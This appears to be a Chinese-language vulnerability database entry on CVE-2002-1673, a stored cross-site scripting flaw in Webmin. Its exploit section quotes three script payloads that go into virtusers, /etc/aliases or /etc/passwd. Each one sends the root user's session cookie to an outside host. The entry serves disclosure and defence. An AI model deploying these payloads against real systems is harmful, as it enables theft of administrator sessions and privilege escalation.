Webmin脚本代码输入验证漏洞

Webmin脚本代码输入验证漏洞

漏洞ID 1106648 漏洞类型 输入验证
发布时间 2002-03-20 更新时间 2005-10-20
图片[1]-Webmin脚本代码输入验证漏洞-安全小百科CVE编号 CVE-2002-1673
图片[2]-Webmin脚本代码输入验证漏洞-安全小百科CNNVD-ID CNNVD-200212-191
漏洞平台 Linux CVSS评分 3.6
|漏洞来源
https://www.exploit-db.com/exploits/21348
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-191
|漏洞详情
Webmin是一款基于WEB接口的Unix和Linux操作系统管理程序。Webmin对显示在WEB接口的输出没有很好过滤脚本代码,可导致恶意脚本代码被执行。Webmin对一些系统文件等输出显示到WEB接口缺少充分的过滤,可以攻击者更改这些文件内容,当ROOT用户浏览时被执行,另外,攻击者也可以在其他类型输出里插入恶意Javascript代码,当ROOT用户浏览此链接的时候,导致脚本代码在ROOT用户浏览器上执行,泄露基于COOKIE认证的敏感信息。
|漏洞EXP
source: http://www.securityfocus.com/bid/4329/info

Webmin is a web-based interface for system administration of Unix and Linux operating systems.

Webmin does not filter script code from output that may be displayed by the web interface, such as log files, etc. This may enable a local attacker, with write privileges to such files, to cause arbitrary script code to be executed by the root user. Additionally, an attacker who can contrive a way to inject malicious script code into other types of output displayed by the Webmin interface may also exploit this issue.

This may enable the attacker to steal cookie-based authentication credentials from the root user, eventually resulting in an escalation of privileges for the local attacker. 

Insert the following line into the virtusers file, and wait for the root
user to visit that page:
</tt></a></td><tt><td><script>/* */document.write('<img
src="http://192.168.40.1/'+document.cookie+'">');</script>

Or the following into the /etc/aliases file:
</a></td><td><tt><script>zz=unescape("%20");document.write('<img'/*:
*/+zz+'src="http://10.1.1.33/'+document.cookie+'">');</script>

Potentially more likely to be exploited however, would be a malicious
local user who has _no_ access to webmin, who could change a file that
webmin views through the HTML
interface (where the code being read in is not checked for HTML). An
example would be changing their
'real name' in /etc/passwd to be something along the lines of:
<script>zz=unescape("%3A");document.write('<img
src="http'+zz+'//10.1.1.33/'+document.cookie+'">');</script>
(Although chfn doesn't let you specify a username this long, but you get
the idea.)
|参考资料

来源:XF
名称:webmin-functions-execute-code(8596)
链接:http://xforce.iss.net/xforce/xfdb/8596
来源:BID
名称:4329
链接:http://www.securityfocus.com/bid/4329
来源:NSFOCUS
名称:2468
链接:http://www.nsfocus.net/vulndb/2468

相关推荐: PostNuke Downloads / Web_Links Modules TTitle Cross-site Scripting Vulnerability

PostNuke Downloads / Web_Links Modules TTitle Cross-site Scripting Vulnerability 漏洞ID 1099769 漏洞类型 Input Validation Error 发布时间 200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享